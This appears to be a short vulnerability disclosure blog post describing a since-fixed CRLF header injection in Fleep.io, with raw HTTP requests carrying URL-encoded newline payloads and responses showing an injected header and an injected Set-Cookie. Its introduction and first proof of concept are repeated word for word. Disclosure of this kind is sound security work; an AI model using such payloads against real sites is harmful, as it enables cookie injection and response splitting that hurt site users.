ASSALAM O ALAIKUM !
After so long period, writing a Short Disclosure of the recent vulnerability that I have found in Fleep.io. It has been fixed now. So, I can share it.
What is CR & LF?
Carriage return is from the days of the typewriters, abbreviated as CR which would return to the next line and push the paper up. Line feed (LF) signals the end of the line. Together, this sequence can be referred to as CRLF.
After so long period, writing a Short Disclosure of the recent vulnerability that I have found in Fleep.io. It has been fixed now. So, I can share it.
What is CR & LF?
Carriage return is from the days of the typewriters, abbreviated as CR which would return to the next line and push the paper up. Line feed (LF) signals the end of the line. Together, this sequence can be referred to as CRLF.
What is CRLF Injection?
When Web application do not properly sanitize user input before using it as an HTTP header value then there should be maximum probability of the existence of Vulnerability CRLF Injection (also called Response Splitting and Header Injection). It allows an attacker to control the remaining headers and body of the response the application and also allow them to create additional responses.
Proof Of Concept:
Request
https://fleep.io/v/ed1202c85b/assets/fleep/%0A%48%65%61%64%65%72%49%6E%6A%65%63%74%65%64%3A%69%6E%6A%65%63%74%65%64%5F%62%79%5F%41%6C%69%5F%48%61%73%73%61%6E%5F%47%68%6F%72%69
GET /v/ed1202c85b/assets/fleep/%0A%48%65%61%64%65%72%49%6E%6A%65%63%74%65%64%3A%69%6E%6A%65%63%74%65%64%5F%62%79%5F%41%6C%69%5F%48%61%73%73%61%6E%5F%47%68%6F%72%69 HTTP/1.1
Host: fleep.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Response
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Jan 2016 08:49:12 GMT
Content-Type: text/html
Content-Length: 178
Location: https://fleep.io/v/ed1202c85b/assets/fleep/
HeaderInjected: injected_by_Ali_Hassan_Ghori/
Connection: keep-alive
Expires: Fri, 22 Jan 2016 08:49:12 GMT
Cache-Control: max-age=172800
content-security-policy: default-src 'none'
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: deny
Proof Of Concept:
Request
https://fleep.io/v/ed1202c85b/assets/fleep/%0A%48%65%61%64%65%72%49%6E%6A%65%63%74%65%64%3A%69%6E%6A%65%63%74%65%64%5F%62%79%5F%41%6C%69%5F%48%61%73%73%61%6E%5F%47%68%6F%72%69
GET /v/ed1202c85b/assets/fleep/%0A%48%65%61%64%65%72%49%6E%6A%65%63%74%65%64%3A%69%6E%6A%65%63%74%65%64%5F%62%79%5F%41%6C%69%5F%48%61%73%73%61%6E%5F%47%68%6F%72%69 HTTP/1.1
Host: fleep.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Response
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Jan 2016 08:49:12 GMT
Content-Type: text/html
Content-Length: 178
Location: https://fleep.io/v/ed1202c85b/assets/fleep/
HeaderInjected: injected_by_Ali_Hassan_Ghori/
Connection: keep-alive
Expires: Fri, 22 Jan 2016 08:49:12 GMT
Cache-Control: max-age=172800
content-security-policy: default-src 'none'
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: deny
So, here I injected cookie.
Request
https://fleep.io/v/ed1202c85b/assets/fleep/%0A%53%65%74%2D%43%6F%6F%6B%69%65%3A%20%69%6E%6A%65%63%74%65%64%43%6F%6F%6B%69%65%3D%73%65%63%75%72%69%74%79%77%61%6C%6C
GET /v/ed1202c85b/assets/fleep/%0A%53%65%74%2D%43%6F%6F%6B%69%65%3A%20%69%6E%6A%65%63%74%65%64%43%6F%6F%6B%69%65%3D%73%65%63%75%72%69%74%79%77%61%6C%6C HTTP/1.1
Host: fleep.io
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Response
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Wed, 20 Jan 2016 09:10:17 GMT
Content-Type: text/html
Content-Length: 178
Location: https://fleep.io/v/ed1202c85b/assets/fleep/
Set-Cookie: injectedCookie=securitywall/
Connection: keep-alive
Expires: Fri, 22 Jan 2016 09:10:17 GMT
Cache-Control: max-age=172800
content-security-policy: default-src 'none'
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
x-content-type-options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: deny
